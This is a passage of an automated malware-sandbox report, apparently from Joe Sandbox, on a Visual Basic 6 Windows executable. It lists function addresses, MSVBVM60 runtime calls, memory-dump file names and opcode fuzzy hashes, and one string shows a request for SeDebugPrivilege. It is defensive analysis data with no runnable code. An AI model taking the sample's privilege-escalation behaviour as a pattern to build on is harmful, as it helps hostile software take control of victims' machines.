                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
                                                                                    • Instruction ID: b391c340adbf3e59c3df7a7246d9472bd0b0b55e754b724d87d5f09335da3bbb
                                                                                    • Opcode Fuzzy Hash: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
                                                                                    • Instruction Fuzzy Hash: 1E310DB5A00118DBDB14DBA4ED84DEE7779EF88300F50856AE506A3261DF34A986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F150 Relevance: 27.1, APIs: 18, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                    • #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                    • #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                    • #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                    • #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                    • __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041F2B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$ErrorMove$#537$#606#616AnsiChkstkOverflowSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1093449089-0
                                                                                    • Opcode ID: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
                                                                                    • Instruction ID: 0e4e532b7f79ceded0d12069193019f5775f2f1d5aa758d8f51e06bfe5b2f4ca
                                                                                    • Opcode Fuzzy Hash: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
                                                                                    • Instruction Fuzzy Hash: 20311C75900149EFDB04DFA4DA4CBDEBBB8FF08305F108169E502B62A0DB755A05CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A2B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 0041A39A
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041A3AB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A3C3
                                                                                    • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 0041A420
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 1749655604-2896544425
                                                                                    • Opcode ID: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
                                                                                    • Instruction ID: 4de2d3f6ed40af32cba968f736910ab2351f3027917a15dd84bedccea81ef083
                                                                                    • Opcode Fuzzy Hash: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
                                                                                    • Instruction Fuzzy Hash: D0514B70901308DBEB10DFA1DA49BEEBBB8FB04704F20816EE105AB291D7B84A45DF56
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429F50 Relevance: 22.6, APIs: 15, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                    • __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3031735744-0
                                                                                    • Opcode ID: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
                                                                                    • Instruction ID: 5fd8a786a428ecf44f1591115f944ef2e4a492f21aad71c04980f5145bc2ad87
                                                                                    • Opcode Fuzzy Hash: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
                                                                                    • Instruction Fuzzy Hash: B731DBB1900209EFCB04EFE4DE49FDE7BB8BB48705F108259F612B65A0D7745A48CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429E10 Relevance: 22.6, APIs: 15, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                    • __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3031735744-0
                                                                                    • Opcode ID: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
                                                                                    • Instruction ID: ef05815d91a7badc13ce189a5e2ee1fd6bd11c379c37ab60153baacb3b4262a3
                                                                                    • Opcode Fuzzy Hash: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
                                                                                    • Instruction Fuzzy Hash: 5231CBB5910149EFCB04EFE4DE48EDEBBB8FB48715F108269F502B61A0DB745A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415980 Relevance: 21.1, APIs: 14, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0041B687,0042C0E8,?), ref: 0041599E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,?,Function_000032B6), ref: 004159CE
                                                                                    • #580.MSVBVM60(?,00000000), ref: 004159E3
                                                                                    • #648.MSVBVM60(0000000A), ref: 00415A02
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00415A0F
                                                                                    • __vbaFileOpen.MSVBVM60(00000020,000000FF,?), ref: 00415A2B
                                                                                    • #570.MSVBVM60(?,?), ref: 00415A42
                                                                                    • __vbaPut4.MSVBVM60(00000000,00000000,-00000001), ref: 00415A58
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00415A6D
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,?), ref: 00415A7E
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00415A87
                                                                                    • __vbaFileClose.MSVBVM60(?), ref: 00415A99
                                                                                    • #580.MSVBVM60(?,00000027), ref: 00415AAE
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00415AE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$#580ErrorFileFree$#570#648ChkstkCloseCopyOpenOverflowPut3Put4
                                                                                    • String ID:
                                                                                    • API String ID: 633625294-0
                                                                                    • Opcode ID: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
                                                                                    • Instruction ID: 077cd5495f4d2610dc4ebb710a7c1806296cb1f910c24ca7336927bb814984b8
                                                                                    • Opcode Fuzzy Hash: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
                                                                                    • Instruction Fuzzy Hash: FE311AB5900208EFEB04DF94DA48BDEBBB8FF48715F108259F501BB6A0D7795A84CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419B10 Relevance: 21.1, APIs: 14, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,?,0040DFD2,?,?,?,Function_000032B6), ref: 00419B2E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 00419B5E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B79
                                                                                    • #525.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419B83
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B8E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BA9
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BC4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,Function_000032B6), ref: 00419BD6
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BE4
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BED
                                                                                    • #519.MSVBVM60(?,?,?,?,?,?,?,Function_000032B6), ref: 00419BFE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C09
                                                                                    • __vbaFreeStr.MSVBVM60(00419C3D,?,?,?,?,?,?,Function_000032B6), ref: 00419C36
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$FreeMove$#519#525AnsiChkstkOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3463755217-0
                                                                                    • Opcode ID: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                    • Instruction ID: 59ab86815b635178f25ac20134c8c30b5a73cca353c440905f8b97c0bcbdadc5
                                                                                    • Opcode Fuzzy Hash: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                    • Instruction Fuzzy Hash: D331CE75900248EFCB04EFA4DA48BDE7BB4FB48305F108669F501B7260DB799A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004212F0 Relevance: 19.6, APIs: 13, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,660E19DC,00000000,00000FEE), ref: 0042134B
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000), ref: 00421365
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421386
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421395
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 004213A2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004213BD
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004213C6
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004213E9
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004213F9
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004213FF
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00421412
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042143F,660E19DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF), ref: 00421438
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000000,660E19DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF,Function_000032B6), ref: 00421450
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3281955820-0
                                                                                    • Opcode ID: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                    • Instruction ID: d3bc4d229a8ccd66a9bed061019a776db086e1d909af8dc46df260a90b41282b
                                                                                    • Opcode Fuzzy Hash: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                    • Instruction Fuzzy Hash: 5E418170E00219DFDB14EF94DD81AAEF7B9EF58700F50811AE501B7660D6B4A8428BE9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042A2F9 Relevance: 19.6, APIs: 13, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000004), ref: 0042A30A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0,?,?), ref: 0042A334
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188,?,?,?,?), ref: 0042A35B
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?), ref: 0042A36D
                                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0042A37D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 0042A39C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3B1
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3C7
                                                                                    • __vbaI4Var.MSVBVM60(?,00000000,?,?,?,00000000), ref: 0042A3E6
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042A3F6
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0042A400
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0042A409
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0042A412
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$CheckFreeHresult$CallLateLockRedimSystemUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 204333147-0
                                                                                    • Opcode ID: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                    • Instruction ID: 897c9a6cfbc361b2304c829fc1f6f3fe0cbd2f804f2c9409275e98d7ea74f451
                                                                                    • Opcode Fuzzy Hash: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                    • Instruction Fuzzy Hash: E031A234600215EBDB04DBA0DD89EAEB779FF44704F208529F902BB2A1D774AC46CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A090 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                    • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                    • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A175
                                                                                    • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A1B2
                                                                                    • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A207
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A230
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A246
                                                                                    • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A26C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041A28F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 1207130036-0
                                                                                    • Opcode ID: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                    • Instruction ID: 8b7a934a7eebc36cfe3af54c4ed22efe6341180558cb6e4886e9f12f2822d10f
                                                                                    • Opcode Fuzzy Hash: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                    • Instruction Fuzzy Hash: 7B51FA74901208EBDB10DFE4DA48BDEBBB5FF48308F208569E501B7390D7799A44DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E730 Relevance: 18.1, APIs: 12, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0040F418,0042C0BC,?), ref: 0041E74E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0041E77E
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0041E795
